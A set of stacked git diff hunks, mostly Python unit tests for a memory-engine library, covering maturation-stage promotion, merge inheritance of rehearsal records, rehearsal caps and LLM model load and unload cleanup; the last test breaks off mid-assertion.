+                    len(load_raw),
+                    _CMD_MAX_PARTS,
+                )
+            else:
+                parts = [str(p).strip() for p in load_raw]
+                if all(p and _TOML_SAFE_ARGV.match(p) for p in parts):
+                    load_cmd = tuple(p[:_TOML_STR_MAX_LEN] for p in parts)
 
         return cls(
             mining_enabled=bool(data.get("mining_enabled", False)),

--- a/tests/unit/test_brain_evolution.py
+++ b/tests/unit/test_brain_evolution.py
@@ -541,6 +541,59 @@ class TestEvolutionEngine:
         }
 
     @pytest.mark.asyncio
+    async def test_progress_pct_credits_the_rehearsal_count_path_too(
+        self, mock_storage: AsyncMock
+    ) -> None:
+        """A fiber ready via rehearsals must not score near-0% progress.
+
+        Regression: progress_pct/closest_to_semantic ranking used to consider
+        only distinct_reinforcement_days, even after classify_episodic_blocker
+        (used for next_step text) already accounted for the rehearsal-count/
+        windows path. A fiber genuinely "ready" via that path scored near 0%
+        and could be excluded from the top-3 "closest" list in favor of a
+        fiber that was not actually ready.
+        """
+        now = utcnow()
+        old_entered = now - timedelta(days=10)  # clears the 7-day time gate
+
+        # Ready via rehearsal-count/windows path: only 1 distinct day, but
+        # 15+ rehearsals across 5+ 2h windows.
+        window_timestamps = tuple(
+            now.replace(hour=h, minute=0, second=0, microsecond=0).isoformat()
+            for h in (0, 2, 4, 6, 8)
+        )
+        ready_via_rehearsal = MaturationRecord(
+            fiber_id="ready-rehearsal",
+            brain_id="brain-1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=old_entered,
+            rehearsal_count=15,
+            reinforcement_timestamps=window_timestamps,
+        )
+        # Not actually ready: only 1 distinct day, low rehearsal count. Would
+        # previously outrank the truly-ready fiber above on progress_pct.
+        not_ready = MaturationRecord(
+            fiber_id="not-ready",
+            brain_id="brain-1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=old_entered,
+            rehearsal_count=2,
+            reinforcement_timestamps=((now - timedelta(hours=1)).isoformat(),),
+        )
+        mock_storage.find_maturations = AsyncMock(return_value=[ready_via_rehearsal, not_ready])
+
+        engine = EvolutionEngine(mock_storage)
+        evo = await engine.analyze("brain-1")
+
+        by_id = {p.fiber_id: p for p in evo.closest_to_semantic}
+        assert by_id["ready-rehearsal"].progress_pct == 1.0
+        assert by_id["ready-rehearsal"].progress_pct > by_id["not-ready"].progress_pct
+        assert evo.closest_to_semantic[0].fiber_id == "ready-rehearsal", (
+            "the genuinely ready fiber must rank first, not be out-ranked by one "
+            "that only looks closer under the distinct-days metric alone"
+        )
+
+    @pytest.mark.asyncio
     async def test_plasticity_recent_synapses(self, mock_storage: AsyncMock) -> None:
         """Recently created/reinforced synapses → plasticity > 0."""
         now = utcnow()

--- a/tests/unit/test_brain_evolution.py
+++ b/tests/unit/test_brain_evolution.py
@@ -463,6 +463,84 @@ class TestEvolutionEngine:
         assert evo.reinforcement_days == 3.0  # 3 distinct days
 
     @pytest.mark.asyncio
+    async def test_semantic_gate_blockers_classify_correctly(self, mock_storage: AsyncMock) -> None:
+        """Aggregate gate-blocker counts must use the real promotion rule.
+
+        Regression for run 010 / D2: the previous inline classification here
+        only checked distinct_reinforcement_days, so a fiber that already
+        qualified via the rehearsal-count/windows path was wrongly counted as
+        still blocked on spacing. Now delegates to classify_episodic_blocker
+        (memory_stages.py), the single source of truth also used by health
+        diagnostics.
+        """
+        now = utcnow()
+        old_entered = now - timedelta(days=10)  # clears the 7-day time gate
+        recent_entered = now - timedelta(days=1)  # does NOT clear it
+
+        ready_via_days = MaturationRecord(
+            fiber_id="ready-days",
+            brain_id="brain-1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=old_entered,
+            reinforcement_timestamps=(
+                (now - timedelta(days=3)).isoformat(),
+                (now - timedelta(days=2)).isoformat(),
+                (now - timedelta(days=1)).isoformat(),
+            ),
+        )
+        still_spacing_blocked = MaturationRecord(
+            fiber_id="spacing-blocked",
+            brain_id="brain-1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=old_entered,
+            rehearsal_count=1,
+            reinforcement_timestamps=((now - timedelta(days=1)).isoformat(),),
+        )
+        still_time_blocked = MaturationRecord(
+            fiber_id="time-blocked",
+            brain_id="brain-1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=recent_entered,
+            reinforcement_timestamps=(
+                (now - timedelta(days=3)).isoformat(),
+                (now - timedelta(days=2)).isoformat(),
+                (now - timedelta(days=1)).isoformat(),
+            ),
+        )
+        # Same calendar day, 5 distinct 2h windows -- qualifies via the
+        # rehearsal-count/windows path even with only 1 distinct day.
+        window_timestamps = tuple(
+            now.replace(hour=h, minute=0, second=0, microsecond=0).isoformat()
+            for h in (0, 2, 4, 6, 8)
+        )
+        ready_via_rehearsal_path = MaturationRecord(
+            fiber_id="ready-rehearsal",
+            brain_id="brain-1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=old_entered,
+            rehearsal_count=15,
+            reinforcement_timestamps=window_timestamps,
+        )
+
+        mock_storage.find_maturations = AsyncMock(
+            return_value=[
+                ready_via_days,
+                still_spacing_blocked,
+                still_time_blocked,
+                ready_via_rehearsal_path,
+            ]
+        )
+
+        engine = EvolutionEngine(mock_storage)
+        evo = await engine.analyze("brain-1")
+
+        assert evo.semantic_gate_blockers == {
+            "time_gate": 1,
+            "spacing_gate": 1,
+            "ready": 2,
+        }
+
+    @pytest.mark.asyncio
     async def test_plasticity_recent_synapses(self, mock_storage: AsyncMock) -> None:
         """Recently created/reinforced synapses → plasticity > 0."""
         now = utcnow()

--- a/tests/unit/test_consolidation.py
+++ b/tests/unit/test_consolidation.py
@@ -563,3 +563,92 @@ async def test_merge_inherits_maturation_from_sources() -> None:
         "with reinforcements spread across 3 distinct days the merged fiber must "
         "clear the spacing gate exactly like an unmerged fiber would"
     )
+
+
+@pytest.mark.asyncio
+async def test_merge_maturation_combination_semantics() -> None:
+    """Locks in the exact inheritance rule, not just the SEMANTIC end-to-end outcome.
+
+    Two sources at different stages: the WORKING source has been in its stage
+    far longer than the EPISODIC source. The merged record must take the
+    *highest* stage (EPISODIC) but the *oldest* stage_entered_at across ALL
+    sources regardless of which source that came from -- otherwise a fiber
+    that already had a 20-day head start in a lower stage would have that
+    dwell time silently discarded just because another source outranked it.
+    rehearsal_count is summed (each source's count is real, independent
+    rehearsal history), and reinforcement_timestamps is the union of both.
+    """
+    store = _MaturationCapableStorage()
+    brain = Brain.create(name="merge_semantics_test", brain_id="ms-brain")
+    await store.save_brain(brain)
+    store.set_brain(brain.id)
+
+    for nid in ("n-a", "n-b"):
+        await store.add_neuron(Neuron.create(type=NeuronType.ENTITY, content=nid, neuron_id=nid))
+
+    shared = {"n-a", "n-b"}
+    old_entered = utcnow() - timedelta(days=20)
+    recent_entered = utcnow() - timedelta(hours=1)
+    ts_a1 = (utcnow() - timedelta(days=5)).isoformat()
+    ts_a2 = (utcnow() - timedelta(days=3)).isoformat()
+    ts_b1 = (utcnow() - timedelta(hours=1)).isoformat()
+
+    source_a = Fiber(
+        id="src-a",
+        neuron_ids=shared,
+        synapse_ids=set(),
+        anchor_neuron_id="n-a",
+        pathway=["n-a"],
+        frequency=1,
+        created_at=old_entered,
+    )
+    source_b = Fiber(
+        id="src-b",
+        neuron_ids=shared,
+        synapse_ids=set(),
+        anchor_neuron_id="n-b",
+        pathway=["n-b"],
+        frequency=1,
+        created_at=old_entered,
+    )
+    for f in (source_a, source_b):
+        await store.add_fiber(f)
+
+    await store.save_maturation(
+        MaturationRecord(
+            fiber_id="src-a",
+            brain_id="ms-brain",
+            stage=MemoryStage.WORKING,
+            stage_entered_at=old_entered,
+            rehearsal_count=2,
+            reinforcement_timestamps=(ts_a1, ts_a2),
+        )
+    )
+    await store.save_maturation(
+        MaturationRecord(
+            fiber_id="src-b",
+            brain_id="ms-brain",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=recent_entered,
+            rehearsal_count=1,
+            reinforcement_timestamps=(ts_b1,),
+        )
+    )
+
+    engine = ConsolidationEngine(store, ConsolidationConfig())
+    await engine._merge(ConsolidationReport(), dry_run=False)
+
+    remaining = await store.get_fibers(limit=100)
+    assert len(remaining) == 1
+    merged = await store.get_maturation(remaining[0].id)
+    assert merged is not None
+
+    assert merged.stage == MemoryStage.EPISODIC, "must take the highest stage of any source"
+    assert merged.stage_entered_at == old_entered, (
+        "must keep the oldest stage_entered_at across ALL sources, not just the "
+        "winning-stage source, or a source's dwell time is silently discarded"
+    )
+    assert merged.rehearsal_count == 3, "rehearsal_count is summed across sources"
+    assert set(merged.reinforcement_timestamps) == {ts_a1, ts_a2, ts_b1}, (
+        "reinforcement_timestamps is the union of every source's timestamps"
+    )

--- a/tests/unit/test_consolidation.py
+++ b/tests/unit/test_consolidation.py
@@ -2,6 +2,8 @@
 
 from __future__ import annotations
 
+from datetime import timedelta
+
 import pytest
 import pytest_asyncio
 
@@ -16,7 +18,13 @@ from surreal_memory.engine.consolidation import (
     ConsolidationStrategy,
 )
 from surreal_memory.engine.lifecycle import DecayManager
+from surreal_memory.engine.memory_stages import (
+    MaturationRecord,
+    MemoryStage,
+    compute_stage_transition,
+)
 from surreal_memory.storage.memory_store import InMemoryStorage
+from surreal_memory.utils.timeutils import utcnow
 
 
 @pytest_asyncio.fixture
@@ -431,3 +439,127 @@ async def test_merge_never_removes_habit_fiber() -> None:
 
     remaining = {f.id for f in await store.get_fibers(limit=100)}
     assert "habit-1" in remaining, "merge must never delete a _habit_pattern fiber"
+
+
+class _MaturationCapableStorage(InMemoryStorage):
+    """InMemoryStorage plus a real maturation table, for merge-inheritance tests.
+
+    InMemoryStorage inherits NeuralStorage's no-op maturation defaults (save is
+    a no-op, get/find always return empty), so a test built on it can exercise
+    the real Union-Find/Jaccard merge path but can never observe whether
+    maturation was read or written. This adds a trivial dict-backed table so
+    run 010 section C (merge losing maturation) can be reproduced end-to-end
+    against real reads/writes instead of mocked ones.
+    """
+
+    def __init__(self) -> None:
+        super().__init__()
+        self._maturations: dict[str, MaturationRecord] = {}
+
+    async def get_maturation(self, fiber_id: str) -> MaturationRecord | None:
+        return self._maturations.get(fiber_id)
+
+    async def save_maturation(self, record: MaturationRecord) -> None:
+        self._maturations[record.fiber_id] = record
+
+    async def find_maturations(
+        self,
+        stage: MemoryStage | None = None,
+        min_rehearsal_count: int = 0,
+    ) -> list[MaturationRecord]:
+        return [
+            m
+            for m in self._maturations.values()
+            if (stage is None or m.stage == stage) and m.rehearsal_count >= min_rehearsal_count
+        ]
+
+
+@pytest.mark.asyncio
+async def test_merge_inherits_maturation_from_sources() -> None:
+    """A fiber created by _merge must inherit source maturation, not restart at STM.
+
+    RUN-010 VALIDATE-FIRST (section C). `_merge` deletes the source fibers and
+    adds a brand-new one; on origin/main it never reads or writes the
+    maturation table for that new fiber, so consolidation destroys the exact
+    progress (stage, rehearsal_count, reinforcement_timestamps) it exists to
+    measure. Two sources reinforced on two distinct calendar days must combine
+    into a record that, after one more reinforcement on a third day, clears
+    the EPISODIC -> SEMANTIC spacing gate -- exactly as an unmerged fiber
+    would. This must FAIL on origin/main.
+    """
+    store = _MaturationCapableStorage()
+    brain = Brain.create(name="merge_maturation_test", brain_id="mm-brain")
+    await store.save_brain(brain)
+    store.set_brain(brain.id)
+
+    for nid in ("n-a", "n-b"):
+        await store.add_neuron(Neuron.create(type=NeuronType.ENTITY, content=nid, neuron_id=nid))
+
+    shared = {"n-a", "n-b"}
+    day1 = utcnow() - timedelta(days=2)
+    day2 = utcnow() - timedelta(days=1)
+
+    source_a = Fiber(
+        id="src-a",
+        neuron_ids=shared,
+        synapse_ids=set(),
+        anchor_neuron_id="n-a",
+        pathway=["n-a"],
+        frequency=3,
+        created_at=day1,
+    )
+    source_b = Fiber(
+        id="src-b",
+        neuron_ids=shared,
+        synapse_ids=set(),
+        anchor_neuron_id="n-b",
+        pathway=["n-b"],
+        frequency=1,
+        created_at=day1,
+    )
+    for f in (source_a, source_b):
+        await store.add_fiber(f)
+
+    await store.save_maturation(
+        MaturationRecord(
+            fiber_id="src-a",
+            brain_id="mm-brain",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=day1 - timedelta(days=8),
+            rehearsal_count=1,
+            reinforcement_timestamps=(day1.isoformat(),),
+        )
+    )
+    await store.save_maturation(
+        MaturationRecord(
+            fiber_id="src-b",
+            brain_id="mm-brain",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=day1 - timedelta(days=8),
+            rehearsal_count=1,
+            reinforcement_timestamps=(day2.isoformat(),),
+        )
+    )
+
+    engine = ConsolidationEngine(store, ConsolidationConfig())
+    await engine._merge(ConsolidationReport(), dry_run=False)
+
+    remaining = await store.get_fibers(limit=100)
+    assert len(remaining) == 1, "the two sources should have merged into one fiber"
+    merged = remaining[0]
+    assert merged.id not in ("src-a", "src-b")
+
+    inherited = await store.get_maturation(merged.id)
+    assert inherited is not None, (
+        "merge must carry the sources' MaturationRecord forward, not silently drop it"
+    )
+    assert inherited.stage == MemoryStage.EPISODIC
+    assert inherited.distinct_reinforcement_days == 2
+
+    third_day = day2 + timedelta(days=1)
+    rehearsed = inherited.rehearse(third_day)
+    promoted = compute_stage_transition(rehearsed, now=third_day)
+    assert promoted.stage == MemoryStage.SEMANTIC, (
+        "with reinforcements spread across 3 distinct days the merged fiber must "
+        "clear the spacing gate exactly like an unmerged fiber would"
+    )

--- a/tests/unit/test_consolidation.py
+++ b/tests/unit/test_consolidation.py
@@ -652,3 +652,71 @@ async def test_merge_maturation_combination_semantics() -> None:
     assert set(merged.reinforcement_timestamps) == {ts_a1, ts_a2, ts_b1}, (
         "reinforcement_timestamps is the union of every source's timestamps"
     )
+
+
+@pytest.mark.asyncio
+async def test_merge_rehearsal_count_matches_the_deduplicated_timestamp_union() -> None:
+    """rehearsal_count must stay derived from the timestamp union, not an
+    independent sum, or a timestamp collision across sources could break the
+    rehearsal_count == len(reinforcement_timestamps) invariant every
+    organically-created MaturationRecord maintains (each rehearse() call
+    increments both together). Two sources sharing one identical timestamp
+    prove it: summing counts would give 2, but only 1 distinct rehearsal
+    event is actually evidenced by the timestamps.
+    """
+    store = _MaturationCapableStorage()
+    brain = Brain.create(name="merge_rehearsal_count_test", brain_id="mrc-brain")
+    await store.save_brain(brain)
+    store.set_brain(brain.id)
+
+    for nid in ("n-a", "n-b"):
+        await store.add_neuron(Neuron.create(type=NeuronType.ENTITY, content=nid, neuron_id=nid))
+
+    shared = {"n-a", "n-b"}
+    entered = utcnow() - timedelta(days=10)
+    shared_ts = (utcnow() - timedelta(days=1)).isoformat()
+
+    source_a = Fiber(
+        id="src-a",
+        neuron_ids=shared,
+        synapse_ids=set(),
+        anchor_neuron_id="n-a",
+        pathway=["n-a"],
+        frequency=1,
+        created_at=entered,
+    )
+    source_b = Fiber(
+        id="src-b",
+        neuron_ids=shared,
+        synapse_ids=set(),
+        anchor_neuron_id="n-b",
+        pathway=["n-b"],
+        frequency=1,
+        created_at=entered,
+    )
+    for f in (source_a, source_b):
+        await store.add_fiber(f)
+
+    for fid in ("src-a", "src-b"):
+        await store.save_maturation(
+            MaturationRecord(
+                fiber_id=fid,
+                brain_id="mrc-brain",
+                stage=MemoryStage.EPISODIC,
+                stage_entered_at=entered,
+                rehearsal_count=1,
+                reinforcement_timestamps=(shared_ts,),  # identical on both sources
+            )
+        )
+
+    engine = ConsolidationEngine(store, ConsolidationConfig())
+    await engine._merge(ConsolidationReport(), dry_run=False)
+
+    remaining = await store.get_fibers(limit=100)
+    merged = await store.get_maturation(remaining[0].id)
+    assert merged is not None
+
+    assert merged.reinforcement_timestamps == (shared_ts,), "the timestamp collapses to one"
+    assert merged.rehearsal_count == len(merged.reinforcement_timestamps) == 1, (
+        "rehearsal_count must track the deduplicated union (1), not a naive sum (2)"
+    )

--- a/tests/unit/test_health_fixes.py
+++ b/tests/unit/test_health_fixes.py
@@ -485,7 +485,7 @@ class TestVersionBump:
     def test_version_is_current(self) -> None:
         import surreal_memory
 
-        assert surreal_memory.__version__ == "2.17.0"
+        assert surreal_memory.__version__ == "2.18.0"
 
 
 class TestPackageIntegrity:

--- a/tests/unit/test_maturation_rehearsal.py
+++ b/tests/unit/test_maturation_rehearsal.py
@@ -128,9 +128,9 @@ class TestMaturationRehearsalOnReinforce:
 
         Uncapping fiber rehearsal entirely could scale unbounded with brain
         size, so the guard now lives on the neuron side
-        (``rehearsal_neuron_limit``, default 25 -- see
-        ``BrainConfig.reinforcement_neuron_limit``) instead of a second,
-        redundant fixed-10 fiber cap.
+        (``rehearsal_neuron_limit``, default 15 -- see
+        ``BrainConfig.reinforcement_neuron_limit`` for why 15 and not a larger
+        jump) instead of a second, redundant fixed-10 fiber cap.
         """
         storage = AsyncMock()
         states = {f"n{i}": _make_neuron_state(f"n{i}") for i in range(30)}
@@ -138,11 +138,11 @@ class TestMaturationRehearsalOnReinforce:
         storage.find_fibers_batch.return_value = [_make_fiber_stub("f0")]
         storage.get_maturation.return_value = _make_maturation("f0")
 
-        mgr = ReinforcementManager()  # default rehearsal_neuron_limit=25
+        mgr = ReinforcementManager()  # default rehearsal_neuron_limit=15
         await mgr.reinforce(storage, [f"n{i}" for i in range(30)])
 
         called_neuron_ids = storage.find_fibers_batch.call_args.args[0]
-        assert len(called_neuron_ids) == 25
+        assert len(called_neuron_ids) == 15
 
     @pytest.mark.asyncio
     async def test_rehearsal_reaches_all_fibers_actually_hit_by_recall(self) -> None:

--- a/tests/unit/test_maturation_rehearsal.py
+++ b/tests/unit/test_maturation_rehearsal.py
@@ -140,6 +140,31 @@ class TestMaturationRehearsalOnReinforce:
         assert storage.get_maturation.call_count == 10
         assert storage.save_maturation.call_count == 10
 
+
+    @pytest.mark.asyncio
+    async def test_rehearsal_reaches_all_fibers_actually_hit_by_recall(self) -> None:
+        """Every fiber recall actually surfaced should be rehearsed, not an arbitrary first 10.
+
+        RUN-010 VALIDATE-FIRST (section B). `for fiber in fibers[:10]` truncates
+        the dedup'd result of `find_fibers_batch` to a fixed first 10 regardless
+        of how many distinct fibers recall actually surfaced, capping the
+        EPISODIC -> SEMANTIC spacing gate's only rehearsal source at a size that
+        does not scale with the brain or the recall. Must FAIL on origin/main.
+        """
+        storage = AsyncMock()
+        states = {f"n{i}": _make_neuron_state(f"n{i}") for i in range(15)}
+        storage.get_neuron_states_batch.return_value = states
+        fibers = [_make_fiber_stub(f"f{i}") for i in range(15)]
+        storage.find_fibers_batch.return_value = fibers
+        storage.get_maturation.return_value = _make_maturation("any")
+
+        mgr = ReinforcementManager()
+        await mgr.reinforce(storage, [f"n{i}" for i in range(15)])
+
+        assert storage.save_maturation.call_count == 15, (
+            "all 15 fibers recall surfaced should be rehearsed, not an arbitrary first 10"
+        )
+
     @pytest.mark.asyncio
     async def test_rehearsal_error_does_not_break_reinforce(self) -> None:
         """If maturation rehearsal fails, neuron reinforcement still succeeds."""
@@ -212,3 +237,68 @@ class TestMatureOrphanedRecords:
         await engine._mature(report, utcnow(), dry_run=False)
 
         storage.cleanup_orphaned_maturations.assert_called_once()
+
+
+class TestStagesAdvancedPerHop:
+    """RUN-010 VALIDATE-FIRST (section D1): stages_advanced flattens 3 hops."""
+
+    @pytest.mark.asyncio
+    async def test_stage_advances_broken_out_by_hop(self) -> None:
+        """The report must say which hop advanced, not just how many advanced in total.
+
+        `report.stages_advanced` sums stm->working, working->episodic, and
+        episodic->semantic into one counter, so "15 advanced" and "zero new
+        semantic" are indistinguishable without reading raw maturation rows.
+        Must FAIL on origin/main (no per-hop breakdown exists yet).
+        """
+        from surreal_memory.engine.consolidation import ConsolidationEngine, ConsolidationReport
+
+        now = utcnow()
+        stm_record = MaturationRecord(
+            fiber_id="f-stm",
+            brain_id="test-brain",
+            stage=MemoryStage.SHORT_TERM,
+            stage_entered_at=now - timedelta(minutes=40),
+        )
+        working_record = MaturationRecord(
+            fiber_id="f-working",
+            brain_id="test-brain",
+            stage=MemoryStage.WORKING,
+            stage_entered_at=now - timedelta(hours=5),
+        )
+        episodic_record = MaturationRecord(
+            fiber_id="f-episodic",
+            brain_id="test-brain",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=now - timedelta(days=8),
+            rehearsal_count=3,
+            reinforcement_timestamps=(
+                (now - timedelta(days=3)).isoformat(),
+                (now - timedelta(days=2)).isoformat(),
+                (now - timedelta(days=1)).isoformat(),
+            ),
+        )
+
+        storage = AsyncMock()
+        storage.current_brain_id = "test-brain"
+        storage.cleanup_orphaned_maturations.return_value = 0
+        storage.find_maturations.return_value = [stm_record, working_record, episodic_record]
+        storage.get_fibers.return_value = []
+
+        config = AsyncMock()
+        config.summarize_min_cluster_size = 5
+        config.summarize_tag_overlap_threshold = 0.5
+
+        engine = ConsolidationEngine(storage, config)
+        report = ConsolidationReport(started_at=now)
+
+        await engine._mature(report, now, dry_run=False)
+
+        assert report.stages_advanced == 3
+        breakdown = report.extra["stage_transitions"]
+        assert breakdown == {
+            "stm_to_working": 1,
+            "working_to_episodic": 1,
+            "episodic_to_semantic": 1,
+        }
+        assert sum(breakdown.values()) == report.stages_advanced

--- a/tests/unit/test_maturation_rehearsal.py
+++ b/tests/unit/test_maturation_rehearsal.py
@@ -140,7 +140,6 @@ class TestMaturationRehearsalOnReinforce:
         assert storage.get_maturation.call_count == 10
         assert storage.save_maturation.call_count == 10
 
-
     @pytest.mark.asyncio
     async def test_rehearsal_reaches_all_fibers_actually_hit_by_recall(self) -> None:
         """Every fiber recall actually surfaced should be rehearsed, not an arbitrary first 10.

--- a/tests/unit/test_maturation_rehearsal.py
+++ b/tests/unit/test_maturation_rehearsal.py
@@ -123,22 +123,26 @@ class TestMaturationRehearsalOnReinforce:
         assert saved.rehearsal_count == 1
 
     @pytest.mark.asyncio
-    async def test_rehearsal_caps_fibers_at_10(self) -> None:
-        """At most 10 fibers should be rehearsed per reinforce call."""
+    async def test_rehearsal_neuron_limit_still_caps_the_lookup(self) -> None:
+        """The neuron fan-out into find_fibers_batch is still capped, just raised and configurable.
+
+        Uncapping fiber rehearsal entirely could scale unbounded with brain
+        size, so the guard now lives on the neuron side
+        (``rehearsal_neuron_limit``, default 25 -- see
+        ``BrainConfig.reinforcement_neuron_limit``) instead of a second,
+        redundant fixed-10 fiber cap.
+        """
         storage = AsyncMock()
-        states = {f"n{i}": _make_neuron_state(f"n{i}") for i in range(15)}
+        states = {f"n{i}": _make_neuron_state(f"n{i}") for i in range(30)}
         storage.get_neuron_states_batch.return_value = states
-        # Return 15 fibers
-        fibers = [_make_fiber_stub(f"f{i}") for i in range(15)]
-        storage.find_fibers_batch.return_value = fibers
-        storage.get_maturation.return_value = _make_maturation("any")
+        storage.find_fibers_batch.return_value = [_make_fiber_stub("f0")]
+        storage.get_maturation.return_value = _make_maturation("f0")
 
-        mgr = ReinforcementManager()
-        await mgr.reinforce(storage, [f"n{i}" for i in range(15)])
+        mgr = ReinforcementManager()  # default rehearsal_neuron_limit=25
+        await mgr.reinforce(storage, [f"n{i}" for i in range(30)])
 
-        # Should cap at 10 fibers
-        assert storage.get_maturation.call_count == 10
-        assert storage.save_maturation.call_count == 10
+        called_neuron_ids = storage.find_fibers_batch.call_args.args[0]
+        assert len(called_neuron_ids) == 25
 
     @pytest.mark.asyncio
     async def test_rehearsal_reaches_all_fibers_actually_hit_by_recall(self) -> None:

--- a/tests/unit/test_memory_stages.py
+++ b/tests/unit/test_memory_stages.py
@@ -7,6 +7,7 @@ from datetime import datetime, timedelta
 from surreal_memory.engine.memory_stages import (
     MaturationRecord,
     MemoryStage,
+    classify_episodic_blocker,
     compute_stage_transition,
     get_decay_multiplier,
 )
@@ -226,3 +227,101 @@ class TestStageTransitions:
         t1 = t0 + timedelta(days=100)
         result = compute_stage_transition(record, now=t1)
         assert result.stage == MemoryStage.SEMANTIC
+
+
+class TestClassifyEpisodicBlocker:
+    """Tests for classify_episodic_blocker — the single source of truth for
+
+    "what's blocking this fiber's EPISODIC -> SEMANTIC promotion" (run 010 / D2).
+    Must stay consistent with compute_stage_transition's EPISODIC branch,
+    including the less obvious rehearsal-count/windows alternative path.
+    """
+
+    def test_ready_when_both_gates_met(self) -> None:
+        """Time and classic 3-distinct-day spacing both satisfied -> ready."""
+        t0 = datetime(2026, 1, 1, 12, 0, 0)
+        record = MaturationRecord(
+            fiber_id="f1",
+            brain_id="b1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=t0,
+            rehearsal_count=5,
+            reinforcement_timestamps=(
+                "2026-01-02T10:00:00",
+                "2026-01-04T10:00:00",
+                "2026-01-06T10:00:00",
+            ),
+        )
+        now = t0 + timedelta(days=8)
+        assert classify_episodic_blocker(record, now=now) == "ready"
+
+    def test_spacing_gate_when_days_not_distinct(self) -> None:
+        """Time satisfied, but reinforcements land on the same calendar day."""
+        t0 = datetime(2026, 1, 1, 12, 0, 0)
+        record = MaturationRecord(
+            fiber_id="f1",
+            brain_id="b1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=t0,
+            rehearsal_count=5,
+            reinforcement_timestamps=(
+                "2026-01-02T10:00:00",
+                "2026-01-02T14:00:00",  # same day
+            ),
+        )
+        now = t0 + timedelta(days=8)
+        assert classify_episodic_blocker(record, now=now) == "spacing_gate"
+
+    def test_time_gate_when_too_recent(self) -> None:
+        """Spacing already satisfied, but the 7-day dwell time is not."""
+        t0 = datetime(2026, 1, 1, 12, 0, 0)
+        record = MaturationRecord(
+            fiber_id="f1",
+            brain_id="b1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=t0,
+            rehearsal_count=5,
+            reinforcement_timestamps=(
+                "2026-01-02T10:00:00",
+                "2026-01-04T10:00:00",
+                "2026-01-06T10:00:00",
+            ),
+        )
+        now = t0 + timedelta(days=5)  # only 5 days
+        assert classify_episodic_blocker(record, now=now) == "time_gate"
+
+    def test_ready_via_rehearsal_count_path(self) -> None:
+        """Only 1 distinct day, but 15+ rehearsals across 5+ 2h windows -> ready.
+
+        Regression guard: an earlier ad-hoc classification (brain_evolution.py,
+        before it reused this function) only checked distinct_reinforcement_days
+        and would have wrongly called this "spacing_gate".
+        """
+        t0 = datetime(2026, 1, 1, 12, 0, 0)
+        same_day = "2026-01-02T"
+        record = MaturationRecord(
+            fiber_id="f1",
+            brain_id="b1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=t0,
+            rehearsal_count=15,
+            reinforcement_timestamps=tuple(
+                f"{same_day}{hour:02d}:00:00" for hour in (0, 2, 4, 6, 8)
+            ),
+        )
+        now = t0 + timedelta(days=8)
+        assert classify_episodic_blocker(record, now=now) == "ready"
+
+    def test_spacing_gate_when_rehearsal_path_incomplete(self) -> None:
+        """15+ rehearsals but fewer than 5 distinct windows -> still spacing_gate."""
+        t0 = datetime(2026, 1, 1, 12, 0, 0)
+        record = MaturationRecord(
+            fiber_id="f1",
+            brain_id="b1",
+            stage=MemoryStage.EPISODIC,
+            stage_entered_at=t0,
+            rehearsal_count=15,
+            reinforcement_timestamps=("2026-01-02T00:00:00", "2026-01-02T02:00:00"),
+        )
+        now = t0 + timedelta(days=8)
+        assert classify_episodic_blocker(record, now=now) == "spacing_gate"

--- a/tests/unit/test_performance_fixes.py
+++ b/tests/unit/test_performance_fixes.py
@@ -350,6 +350,10 @@ class TestInvertedIndexMerge:
         storage = AsyncMock()
         storage._get_brain_id = MagicMock(return_value="brain1")
         storage._current_brain_id = "brain1"
+        # None = "no maturation record for this fiber" (base.py's own default),
+        # not the bare AsyncMock() a plain attribute access would otherwise
+        # return -- _merge now reads this per source fiber (run 010 / C).
+        storage.get_maturation = AsyncMock(return_value=None)
         return storage
 
     @pytest.mark.asyncio

--- a/tests/unit/test_reasoning_distiller.py
+++ b/tests/unit/test_reasoning_distiller.py
@@ -456,6 +456,10 @@ class _SpyNamer:
     def __init__(self) -> None:
         self.renamed = 0
         self.released = 0
+        self.acquired = 0
+
+    async def acquire(self) -> None:
+        self.acquired += 1
 
     async def rename(self, pattern: dict, cluster_traces: list[dict]) -> dict:
         self.renamed += 1
@@ -500,6 +504,7 @@ class TestLLMNamingIsWiredIn:
 
         await distill_reasoning_patterns(storage, BRAIN, _ucfg(tmp_path), drain=True)
 
+        assert spy.acquired == 1
         assert spy.released == 1
 
     async def test_the_model_is_released_even_when_the_run_blows_up(
@@ -522,6 +527,7 @@ class TestLLMNamingIsWiredIn:
         with pytest.raises(RuntimeError):
             await distill_reasoning_patterns(storage, BRAIN, _ucfg(tmp_path), drain=True)
 
+        assert spy.acquired == 1
         assert spy.released == 1
 
     async def test_no_namer_means_the_heuristic_title_survives(

--- a/tests/unit/test_reasoning_naming.py
+++ b/tests/unit/test_reasoning_naming.py
@@ -755,6 +755,40 @@ class TestAcquire:
 
         assert renamed["title"] == "Read before editing"
 
+    async def test_a_load_that_times_out_still_counts_as_a_load(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """Mirrors rename()'s own rule: a command that times out may still
+
+        have started pulling the model into memory, so release() must still
+        attempt cleanup. Regression: _model_in_use used to be set only after
+        self._run() returned successfully, so a load command hitting
+        _LOAD_TIMEOUT_SECONDS (raising TimeoutError, exactly what
+        _run_command_subprocess does when it kills a stuck process) left the
+        flag False and release() silently skipped the unload -- stranding the
+        model in VRAM, the exact leak this feature exists to prevent.
+        """
+        monkeypatch.setenv(LLM_ENDPOINT_ENV, LOOPBACK)
+        run = _Runner(raises=TimeoutError("load timed out"))
+        namer = build_namer(
+            _config(
+                distill_llm_model="gemma-4-12b",
+                distill_llm_load_cmd=("llamastash-load.py", "{model}"),
+                distill_llm_unload_cmd=("llamastash-stop.py", "{model}"),
+            ),
+            post_json=_Transport(),
+            run_command=run,
+        )
+        assert namer is not None
+
+        await namer.acquire()  # must not raise
+        await namer.release()
+
+        assert run.calls == [
